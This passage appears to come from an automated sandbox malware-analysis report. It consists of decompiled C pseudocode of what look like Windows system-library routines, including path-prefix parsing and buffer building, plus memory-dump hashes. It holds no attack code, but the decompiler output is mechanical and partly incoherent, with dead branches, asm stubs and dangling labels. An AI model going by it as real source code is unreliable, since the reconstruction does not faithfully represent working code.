            											__eflags =  *(_t312 - 5) & 1;
            											if(( *(_t312 - 5) & 1) != 0) {
            												_push(_t528 - 0x98);
            												_push(0x4c);
            												_push(_t528 - 0x70);
            												_push(1);
            												_push(0xfffffffa);
            												_t412 = E04469710();
            												_t475 = _t427;
            												__eflags = _t412;
            												if(_t412 >= 0) {
            													_t414 =  *(_t528 - 0x98) - 8;
            													 *(_t528 - 0x98) = _t414;
            													_t416 = _t414 + 0x0000000f & 0x0000fff8;
            													 *(_t528 - 0x8c) = _t416;
            													 *(_t528 - 0x79) = 1;
            													_t511 = (_t416 & 0x0000ffff) + _t498;
            													__eflags = _t511;
            												}
            											}
            											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
            											__eflags = _t446 & 0x00000004;
            											if((_t446 & 0x00000004) != 0) {
            												__eflags =  *(_t528 - 0x9c);
            												if( *(_t528 - 0x9c) != 0) {
            													 *(_t528 - 0x7a) = 1;
            													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
            													__eflags = _t511;
            												}
            											}
            											_t313 = 2;
            											_t447 = _t446 & _t313;
            											__eflags = _t447;
            											 *(_t528 - 0xd4) = _t447;
            											if(_t447 != 0) {
            												_t406 = 0x10;
            												_t511 = _t511 + _t406;
            												__eflags = _t511;
            											}
            											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
            											 *(_t528 - 0x88) = _t427;
            											__eflags =  *(_t528 + 0x1c);
            											if( *(_t528 + 0x1c) <= 0) {
            												L45:
            												__eflags =  *(_t528 - 0xb0);
            												if( *(_t528 - 0xb0) != 0) {
            													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
            													__eflags = _t511;
            												}
            												__eflags = _t475;
            												if(_t475 != 0) {
            													asm("lock dec dword [ecx+edx*8+0x4]");
            													goto L100;
            												} else {
            													_t494[3] = _t511;
            													_t451 =  *(_t528 - 0xa0);
            													_t427 = E04466DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
            													 *(_t528 - 0x88) = _t427;
            													__eflags = _t427;
            													if(_t427 == 0) {
            														__eflags = _t511 - 0xfff8;
            														if(_t511 <= 0xfff8) {
            															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
            															asm("sbb ecx, ecx");
            															__eflags = (_t451 & 0x000000e2) + 8;
            														}
            														asm("lock dec dword [eax+edx*8+0x4]");
            														L100:
            														goto L101;
            													}
            													_t453 =  *(_t528 - 0xa0);
            													 *_t494 = _t453;
            													_t494[1] = _t427;
            													_t494[2] =  *(_t528 - 0xbc);
            													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
            													 *_t427 =  *(_t453 + 0x24) | _t511;
            													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
            													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
            													asm("movsd");
            													asm("movsd");
            													asm("movsd");
            													asm("movsd");
            													asm("movsd");
            													asm("movsd");
            													asm("movsd");
            													asm("movsd");
            													__eflags =  *(_t528 + 0x14);
            													if( *(_t528 + 0x14) == 0) {
            														__eflags =  *[fs:0x18] + 0xf50;
            													}
            													asm("movsd");
            													asm("movsd");
            													asm("movsd");
            													asm("movsd");
            													__eflags =  *(_t528 + 0x18);
            													if( *(_t528 + 0x18) == 0) {
            														_t454 =  *(_t528 - 0x80);
            														_t479 =  *(_t528 - 0x78);
            														_t327 = 1;
            														__eflags = 1;
            													} else {
            														_t146 = _t427 + 0x50; // 0x50
            														_t454 = _t146;
            														 *(_t528 - 0x80) = _t454;
            														_t382 = 0x18;
            														 *_t454 = _t382;
            														 *((short*)(_t454 + 2)) = 1;
            														_t385 = 0x10;
            														 *((short*)(_t454 + 6)) = _t385;
            														 *(_t454 + 4) = 0;
            														asm("movsd");
            														asm("movsd");
            														asm("movsd");
            														asm("movsd");
            														_t327 = 1;
            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
            														_t479 = 0x68;
            														 *(_t528 - 0x78) = _t479;
            													}
            													__eflags =  *(_t528 - 0x79) - _t327;
            													if( *(_t528 - 0x79) == _t327) {
            														_t524 = _t479 + _t427;
            														_t508 =  *(_t528 - 0x8c);
            														 *_t524 = _t508;
            														_t373 = 2;
            														 *((short*)(_t524 + 2)) = _t373;
            														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
            														 *((short*)(_t524 + 4)) = 0;
            														_t167 = _t524 + 8; // 0x8
            														E0446F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
            														_t529 = _t529 + 0xc;
            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
            														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
            														 *(_t528 - 0x78) = _t479;
            														_t380 =  *(_t528 - 0x80);
            														__eflags = _t380;
            														if(_t380 != 0) {
            															_t173 = _t380 + 4;
            															 *_t173 =  *(_t380 + 4) | 1;
            															__eflags =  *_t173;
            														}
            														_t454 = _t524;
            														 *(_t528 - 0x80) = _t454;
            														_t327 = 1;
            														__eflags = 1;
            													}
            													__eflags =  *(_t528 - 0xd4);
            													if( *(_t528 - 0xd4) == 0) {
            														_t505 =  *(_t528 - 0x80);
            													} else {
            														_t505 = _t479 + _t427;
            														_t523 = 0x10;
            														 *_t505 = _t523;
            														_t367 = 3;
            														 *((short*)(_t505 + 2)) = _t367;
            														_t368 = 4;
            														 *((short*)(_t505 + 6)) = _t368;
            														 *(_t505 + 4) = 0;
            														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
            														_t327 = 1;
            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
            														_t479 = _t479 + _t523;
            														 *(_t528 - 0x78) = _t479;
            														__eflags = _t454;
            														if(_t454 != 0) {
            															_t186 = _t454 + 4;
            															 *_t186 =  *(_t454 + 4) | 1;
            															__eflags =  *_t186;
            														}
            														 *(_t528 - 0x80) = _t505;
            													}
            													__eflags =  *(_t528 - 0x7a) - _t327;
            													if( *(_t528 - 0x7a) == _t327) {
            														 *(_t528 - 0xd4) = _t479 + _t427;
            														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
            														E0446F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
            														_t529 = _t529 + 0xc;
            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
            														_t479 =  *(_t528 - 0x78) + _t522;
            														 *(_t528 - 0x78) = _t479;
            														__eflags = _t505;
            														if(_t505 != 0) {
            															_t199 = _t505 + 4;
            															 *_t199 =  *(_t505 + 4) | 1;
            															__eflags =  *_t199;
            														}
            														_t505 =  *(_t528 - 0xd4);
            														 *(_t528 - 0x80) = _t505;
            													}
            													__eflags =  *(_t528 - 0xa8);
            													if( *(_t528 - 0xa8) != 0) {
            														_t356 = _t479 + _t427;
            														 *(_t528 - 0xd4) = _t356;
            														_t462 =  *(_t528 - 0xac);
            														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
            														_t485 = 0xc;
            														 *((short*)(_t356 + 2)) = _t485;
            														 *(_t356 + 6) = _t462;
            														 *((short*)(_t356 + 4)) = 0;
            														_t211 = _t356 + 8; // 0x9
            														E0446F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
            														E0446FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
            														_t529 = _t529 + 0x18;
            														_t427 =  *(_t528 - 0x88);
            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
            														_t505 =  *(_t528 - 0xd4);
            														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
            														 *(_t528 - 0x78) = _t479;
            														_t362 =  *(_t528 - 0x80);
            														__eflags = _t362;
            														if(_t362 != 0) {
            															_t222 = _t362 + 4;
            															 *_t222 =  *(_t362 + 4) | 1;
            															__eflags =  *_t222;
            														}
            													}
            													__eflags =  *(_t528 - 0xb0);
            													if( *(_t528 - 0xb0) != 0) {
            														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
            														_t458 = 0xb;
            														 *((short*)(_t479 + _t427 + 2)) = _t458;
            														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
            														 *((short*)(_t427 + 4 + _t479)) = 0;
            														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
            														E0446FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
            														_t529 = _t529 + 0xc;
            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
            														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
            														 *(_t528 - 0x78) = _t479;
            														__eflags = _t505;
            														if(_t505 != 0) {
            															_t241 = _t505 + 4;
            															 *_t241 =  *(_t505 + 4) | 1;
            															__eflags =  *_t241;
            														}
            													}
            													_t328 =  *(_t528 + 0x1c);
            													__eflags = _t328;
            													if(_t328 == 0) {
            														L87:
            														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
            														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
            														_t455 =  *(_t528 - 0xdc);
            														 *(_t427 + 0x14) = _t455;
            														_t480 =  *(_t528 - 0xa0);
            														_t517 = 3;
            														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
            														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
            															asm("rdtsc");
            															 *(_t427 + 0x3c) = _t480;
            														} else {
            															 *(_t427 + 0x3c) = _t455;
            														}
            														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
            														_t456 =  *[fs:0x18];
            														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
            														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
            														_t427 = 0;
            														__eflags = 0;
            														_t511 = 0x18;
            														goto L91;
            													} else {
            														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
            														__eflags = _t519;
            														 *(_t528 - 0x8c) = _t328;
            														do {
            															_t506 =  *((intOrPtr*)(_t519 - 4));
            															_t457 =  *((intOrPtr*)(_t519 - 0xc));
            															 *(_t528 - 0xd4) =  *(_t519 - 8);
            															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
            															__eflags =  *(_t333 + 0x36) & 0x00004000;
            															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
            																_t334 =  *_t519;
            															} else {
            																_t334 = 0;
            															}
            															_t336 = _t334 & 0x000000ff;
            															__eflags = _t336;
            															_t427 =  *(_t528 - 0x88);
            															if(_t336 == 0) {
            																_t481 = _t479 + _t506;
            																__eflags = _t481;
            																 *(_t528 - 0x78) = _t481;
            																E0446F3E0(_t479 + _t427, _t457, _t506);
            																_t529 = _t529 + 0xc;
            															} else {
            																_t340 = _t336 - 1;
            																__eflags = _t340;
            																if(_t340 == 0) {
            																	E0446F3E0( *(_t528 - 0xb8), _t457, _t506);
            																	_t529 = _t529 + 0xc;
            																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
            																} else {
            																	__eflags = _t340 == 0;
            																	if(_t340 == 0) {
            																		__eflags = _t506 - 8;
            																		if(_t506 == 8) {
            																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
            																			 *(_t528 - 0xdc) =  *(_t457 + 4);
            																		}
            																	}
            																}
            															}
            															_t339 = 0x10;
            															_t519 = _t519 + _t339;
            															_t263 = _t528 - 0x8c;
            															 *_t263 =  *(_t528 - 0x8c) - 1;
            															__eflags =  *_t263;
            															_t479 =  *(_t528 - 0x78);
            														} while ( *_t263 != 0);
            														goto L87;
            													}
            												}
            											} else {
            												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
            												 *(_t528 - 0xa2) = _t392;
            												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
            												__eflags = _t469;
            												while(1) {
            													 *(_t528 - 0xe4) = _t511;
            													__eflags = _t392;
            													_t393 = _t427;
            													if(_t392 != 0) {
            														_t393 =  *((intOrPtr*)(_t469 + 4));
            													}
            													_t395 = (_t393 & 0x000000ff) - _t427;
            													__eflags = _t395;
            													if(_t395 == 0) {
            														_t511 = _t511 +  *_t469;
            														__eflags = _t511;
            													} else {
            														_t398 = _t395 - 1;
            														__eflags = _t398;
            														if(_t398 == 0) {
            															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
            															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
            														} else {
            															__eflags = _t398 == 1;
            															if(_t398 == 1) {
            																 *(_t528 - 0xa8) =  *(_t469 - 8);
            																_t402 =  *_t469 & 0x0000ffff;
            																 *(_t528 - 0xac) = _t402;
            																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
            															}
            														}
            													}
            													__eflags = _t511 -  *(_t528 - 0xe4);
            													if(_t511 <  *(_t528 - 0xe4)) {
            														break;
            													}
            													_t397 =  *(_t528 - 0x88) + 1;
            													 *(_t528 - 0x88) = _t397;
            													_t469 = _t469 + 0x10;
            													__eflags = _t397 -  *(_t528 + 0x1c);
            													_t392 =  *(_t528 - 0xa2);
            													if(_t397 <  *(_t528 + 0x1c)) {
            														continue;
            													}
            													goto L45;
            												}
            												_t475 = 0x216;
            												 *(_t528 - 0x74) = 0x216;
            												goto L45;
            											}
            										} else {
            											asm("lock dec dword [eax+ecx*8+0x4]");
            											goto L16;
            										}
            									}
            									_t491 = E044F4CAB(_t306, _t528 - 0xa4);
            									 *(_t528 - 0x74) = _t491;
            									__eflags = _t491;
            									if(_t491 != 0) {
            										goto L91;
            									} else {
            										_t474 =  *((intOrPtr*)(_t528 - 0x94));
            										goto L20;
            									}
            								}
            								L16:
            								 *(_t528 - 0x74) = 0x1069;
            								L93:
            								_t298 =  *(_t528 - 0xd0) + 1;
            								 *(_t528 - 0xd0) = _t298;
            								_t474 = _t474 + _t511;
            								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
            								_t494 = 4;
            								__eflags = _t298 - _t494;
            								if(_t298 >= _t494) {
            									goto L100;
            								}
            								_t494 =  *(_t528 - 0xcc);
            								_t435 = _t298;
            								continue;
            							}
            							__eflags = _t494[2] | _t494[3];
            							if((_t494[2] | _t494[3]) == 0) {
            								goto L15;
            							}
            							goto L12;
            						}
            						__eflags = _t301;
            						if(_t301 != 0) {
            							goto L92;
            						}
            						goto L10;
            						L92:
            						goto L93;
            					}
            				} else {
            					_push(0x57);
            					L101:
            					return E0447D130(_t427, _t494, _t511);
            				}
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4dada7773f2661de98c2028516dfa6c49f36f3a55e2a9761eb639e7652598ac9
            • Instruction ID: b9fe819c0fe8c813f683c6e6835225e612303d41cecc51cf4792344e232f52cb
            • Opcode Fuzzy Hash: 4dada7773f2661de98c2028516dfa6c49f36f3a55e2a9761eb639e7652598ac9
            • Instruction Fuzzy Hash: 26423C75A00219DFDB24CF68C980BAAB7B1FF45304F1581AAD94DAB342E735A986CF50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 92%
            			E04444120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
            				signed int _v8;
            				void* _v20;
            				signed int _v24;
            				char _v532;
            				char _v540;
            				signed short _v544;
            				signed int _v548;
            				signed short* _v552;
            				signed short _v556;
            				signed short* _v560;
            				signed short* _v564;
            				signed short* _v568;
            				void* _v570;
            				signed short* _v572;
            				signed short _v576;
            				signed int _v580;
            				char _v581;
            				void* _v584;
            				unsigned int _v588;
            				signed short* _v592;
            				void* _v597;
            				void* _v600;
            				void* _v604;
            				void* _v609;
            				void* _v616;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				unsigned int _t161;
            				signed int _t162;
            				unsigned int _t163;
            				void* _t169;
            				signed short _t173;
            				signed short _t177;
            				signed short _t181;
            				unsigned int _t182;
            				signed int _t185;
            				signed int _t213;
            				signed int _t225;
            				short _t233;
            				signed char _t234;
            				signed int _t242;
            				signed int _t243;
            				signed int _t244;
            				signed int _t245;
            				signed int _t250;
            				void* _t251;
            				signed short* _t254;
            				void* _t255;
            				signed int _t256;
            				void* _t257;
            				signed short* _t260;
            				signed short _t265;
            				signed short* _t269;
            				signed short _t271;
            				signed short** _t272;
            				signed short* _t275;
            				signed short _t282;
            				signed short _t283;
            				signed short _t290;
            				signed short _t299;
            				signed short _t307;
            				signed int _t308;
            				signed short _t311;
            				signed short* _t315;
            				signed short _t316;
            				void* _t317;
            				void* _t319;
            				signed short* _t321;
            				void* _t322;
            				void* _t323;
            				unsigned int _t324;
            				signed int _t325;
            				void* _t326;
            				signed int _t327;
            				signed int _t329;
            
            				_t329 = (_t327 & 0xfffffff8) - 0x24c;
            				_v8 =  *0x451d360 ^ _t329;
            				_t157 = _a8;
            				_t321 = _a4;
            				_t315 = __edx;
            				_v548 = __ecx;
            				_t305 = _a20;
            				_v560 = _a12;
            				_t260 = _a16;
            				_v564 = __edx;
            				_v580 = _a8;
            				_v572 = _t260;
            				_v544 = _a20;
            				if( *__edx <= 8) {
            					L3:
            					if(_t260 != 0) {
            						 *_t260 = 0;
            					}
            					_t254 =  &_v532;
            					_v588 = 0x208;
            					if((_v548 & 0x00000001) != 0) {
            						_v556 =  *_t315;
            						_v552 = _t315[2];
            						_t161 = E0445F232( &_v556);
            						_t316 = _v556;
            						_v540 = _t161;
            						goto L17;
            					} else {
            						_t306 = 0x208;
            						_t298 = _t315;
            						_t316 = E04446E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
            						if(_t316 == 0) {
            							L68:
            							_t322 = 0xc0000033;
            							goto L39;
            						} else {
            							while(_v581 == 0) {
            								_t233 = _v588;
            								if(_t316 > _t233) {
            									_t234 = _v548;
            									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
            										_t254 = L04444620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
            										if(_t254 == 0) {
            											_t169 = 0xc0000017;
            										} else {
            											_t298 = _v564;
            											_v588 = _t316;
            											_t306 = _t316;
            											_t316 = E04446E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
            											if(_t316 != 0) {
            												continue;
            											} else {
            												goto L68;
            											}
            										}
            									} else {
            										goto L90;
            									}
            								} else {
            									_v556 = _t316;
            									 *((short*)(_t329 + 0x32)) = _t233;
            									_v552 = _t254;
            									if(_t316 < 2) {
            										L11:
            										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
            											_t161 = 5;
            										} else {
            											if(_t316 < 6) {
            												L87:
            												_t161 = 3;
            											} else {
            												_t242 = _t254[2] & 0x0000ffff;
            												if(_t242 != 0x5c) {
            													if(_t242 == 0x2f) {
            														goto L16;
            													} else {
            														goto L87;
            													}
            													goto L101;
            												} else {
            													L16:
            													_t161 = 2;
            												}
            											}
            										}
            									} else {
            										_t243 =  *_t254 & 0x0000ffff;
            										if(_t243 == 0x5c || _t243 == 0x2f) {
            											if(_t316 < 4) {
            												L81:
            												_t161 = 4;
            												goto L17;
            											} else {
            												_t244 = _t254[1] & 0x0000ffff;
            												if(_t244 != 0x5c) {
            													if(_t244 == 0x2f) {
            														goto L60;
            													} else {
            														goto L81;
            													}
            												} else {
            													L60:
            													if(_t316 < 6) {
            														L83:
            														_t161 = 1;
            														goto L17;
            													} else {
            														_t245 = _t254[2] & 0x0000ffff;
            														if(_t245 != 0x2e) {
            															if(_t245 == 0x3f) {
            																goto L62;
            															} else {
            																goto L83;
            															}
            														} else {
            															L62:
            															if(_t316 < 8) {
            																L85:
            																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
            																goto L17;
            															} else {
            																_t250 = _t254[3] & 0x0000ffff;
            																if(_t250 != 0x5c) {
            																	if(_t250 == 0x2f) {
            																		goto L64;
            																	} else {
            																		goto L85;
            																	}
            																} else {
            																	L64:
            																	_t161 = 6;
            																	goto L17;
            																}
            															}
            														}
            													}
            												}
            											}
            											goto L101;
            										} else {
            											goto L11;
            										}
            									}
            									L17:
            									if(_t161 != 2) {
            										_t162 = _t161 - 1;
            										if(_t162 > 5) {
            											goto L18;
            										} else {
            											switch( *((intOrPtr*)(_t162 * 4 +  &M044445F8))) {
            												case 0:
            													_v568 = 0x4401078;
            													__eax = 2;
            													goto L20;
            												case 1:
            													goto L18;
            												case 2:
            													_t163 = 4;
            													goto L19;
            											}
            										}
            										goto L41;
            									} else {
            										L18:
            										_t163 = 0;
            										L19:
            										_v568 = 0x44011c4;
            									}
            									L20:
            									_v588 = _t163;
            									_v564 = _t163 + _t163;
            									_t306 =  *_v568 & 0x0000ffff;
            									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
            									_v576 = _t265;
            									if(_t265 > 0xfffe) {
            										L90:
            										_t322 = 0xc0000106;
            									} else {
            										if(_t321 != 0) {
            											if(_t265 > (_t321[1] & 0x0000ffff)) {
            												if(_v580 != 0) {
            													goto L23;
            												} else {
            													_t322 = 0xc0000106;
            													goto L39;
            												}
            											} else {
            												_t177 = _t306;
            												goto L25;
            											}
            											goto L101;
            										} else {
            											if(_v580 == _t321) {
            												_t322 = 0xc000000d;
            											} else {
            												L23:
            												_t173 = L04444620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
            												_t269 = _v592;
            												_t269[2] = _t173;
            												if(_t173 == 0) {
            													_t322 = 0xc0000017;
            												} else {
            													_t316 = _v556;
            													 *_t269 = 0;
            													_t321 = _t269;
            													_t269[1] = _v576;
            													_t177 =  *_v568 & 0x0000ffff;
            													L25:
            													_v580 = _t177;
            													if(_t177 == 0) {
            														L29:
            														_t307 =  *_t321 & 0x0000ffff;
            													} else {
            														_t290 =  *_t321 & 0x0000ffff;
            														_v576 = _t290;
            														_t310 = _t177 & 0x0000ffff;
            														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
            															_t307 =  *_t321 & 0xffff;
            														} else {
            															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
            															E0446F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
            															_t329 = _t329 + 0xc;
            															_t311 = _v580;
            															_t225 =  *_t321 + _t311 & 0x0000ffff;
            															 *_t321 = _t225;
            															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
            																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
            															}
            															goto L29;
            														}
            													}
            													_t271 = _v556 - _v588 + _v588;
            													_v580 = _t307;
            													_v576 = _t271;
            													if(_t271 != 0) {
            														_t308 = _t271 & 0x0000ffff;
            														_v588 = _t308;
            														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
            															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
            															E0446F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
            															_t329 = _t329 + 0xc;
            															_t213 =  *_t321 + _v576 & 0x0000ffff;
            															 *_t321 = _t213;
            															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
            																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
            															}
            														}
            													}
            													_t272 = _v560;
            													if(_t272 != 0) {
            														 *_t272 = _t321;
            													}
            													_t306 = 0;
            													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
            													_t275 = _v572;
            													if(_t275 != 0) {
            														_t306 =  *_t275;
            														if(_t306 != 0) {
            															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
            														}
            													}
            													_t181 = _v544;
            													if(_t181 != 0) {
            														 *_t181 = 0;
            														 *((intOrPtr*)(_t181 + 4)) = 0;
            														 *((intOrPtr*)(_t181 + 8)) = 0;
            														 *((intOrPtr*)(_t181 + 0xc)) = 0;
            														if(_v540 == 5) {
            															_t182 = E044252A5(1);
            															_v588 = _t182;
            															if(_t182 == 0) {
            																E0443EB70(1, 0x45179a0);
            																goto L38;
            															} else {
            																_v560 = _t182 + 0xc;
            																_t185 = E0443AA20( &_v556, _t182 + 0xc,  &_v556, 1);
            																if(_t185 == 0) {
            																	_t324 = _v588;
            																	goto L97;
            																} else {
            																	_t306 = _v544;
            																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
            																	 *(_t306 + 4) = _t282;
            																	_v576 = _t282;
            																	_t325 = _t316 -  *_v560 & 0x0000ffff;
            																	 *_t306 = _t325;
            																	if( *_t282 == 0x5c) {
            																		_t149 = _t325 - 2; // -2
            																		_t283 = _t149;
            																		 *_t306 = _t283;
            																		 *(_t306 + 4) = _v576 + 2;
            																		_t185 = _t283 & 0x0000ffff;
            																	}
            																	_t324 = _v588;
            																	 *(_t306 + 2) = _t185;
            																	if((_v548 & 0x00000002) == 0) {
            																		L97:
            																		asm("lock xadd [esi], eax");
            																		if((_t185 | 0xffffffff) == 0) {
            																			_push( *((intOrPtr*)(_t324 + 4)));
            																			E044695D0();
            																			L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
            																		}
            																	} else {
            																		 *(_t306 + 0xc) = _t324;
            																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
            																	}
            																	goto L38;
            																}
            															}
            															goto L41;
            														}
            													}
            													L38:
            													_t322 = 0;
            												}
            											}
            										}
            									}
            									L39:
            									if(_t254 !=  &_v532) {
            										L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
            									}
            									_t169 = _t322;
            								}
            								goto L41;
            							}
            							goto L68;
            						}
            					}
            					L41:
            					_pop(_t317);
            					_pop(_t323);
            					_pop(_t255);
            					return E0446B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
            				} else {
            					_t299 = __edx[2];
            					if( *_t299 == 0x5c) {
            						_t256 =  *(_t299 + 2) & 0x0000ffff;
            						if(_t256 != 0x5c) {
            							if(_t256 != 0x3f) {
            								goto L2;
            							} else {
            								goto L50;
            							}
            						} else {
            							L50:
            							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
            								goto L2;
            							} else {
            								_t251 = E04463D43(_t315, _t321, _t157, _v560, _v572, _t305);
            								_pop(_t319);
            								_pop(_t326);
            								_pop(_t257);
            								return E0446B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
            							}
            						}
            					} else {
            						L2:
            						_t260 = _v572;
            						goto L3;
            					}
            				}
            				L101:
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6142da94e7eec412552e76bbf38a9abd65ee1a6a0881f758f02b62499ca8ffc1
            • Instruction ID: 919abce6dc4c6b4096cbe079f943ad85dd97c4ad3713b327cd5f24069aa09c61
            • Opcode Fuzzy Hash: 6142da94e7eec412552e76bbf38a9abd65ee1a6a0881f758f02b62499ca8ffc1
            • Instruction Fuzzy Hash: C6F14B706082518BEB24DF59C480A3BB7E1BF88758F14492FF886CB351E734E996DB52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 67%
            			E0445513A(intOrPtr __ecx, void* __edx) {
            				signed int _v8;
            				signed char _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				char _v28;
            				signed int _v32;
            				signed int _v36;
            				signed int _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				char _v63;
            				char _v64;
            				signed int _v72;
            				signed int _v76;
            				signed int _v80;
            				signed int _v84;
            				signed int _v88;
            				signed char* _v92;
            				signed int _v100;
            				signed int _v104;
            				char _v105;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t157;
            				signed int _t159;
            				signed int _t160;
            				unsigned int* _t161;
            				intOrPtr _t165;
            				signed int _t172;
            				signed char* _t181;
            				intOrPtr _t189;
            				intOrPtr* _t200;
            				signed int _t202;
            				signed int _t203;
            				char _t204;
            				signed int _t207;
            				signed int _t208;
            				void* _t209;
            				intOrPtr _t210;
            				signed int _t212;
            				signed int _t214;
            				signed int _t221;
            				signed int _t222;
            				signed int _t226;
            				intOrPtr* _t232;
            				signed int _t233;
            				signed int _t234;
            				intOrPtr _t237;
            				intOrPtr _t238;
            				intOrPtr _t240;
            				void* _t245;
            				signed int _t246;
            				signed int _t247;
            				void* _t248;
            				void* _t251;
            				void* _t252;
            				signed int _t253;
            				signed int _t255;
            				signed int _t256;
            
            				_t255 = (_t253 & 0xfffffff8) - 0x6c;
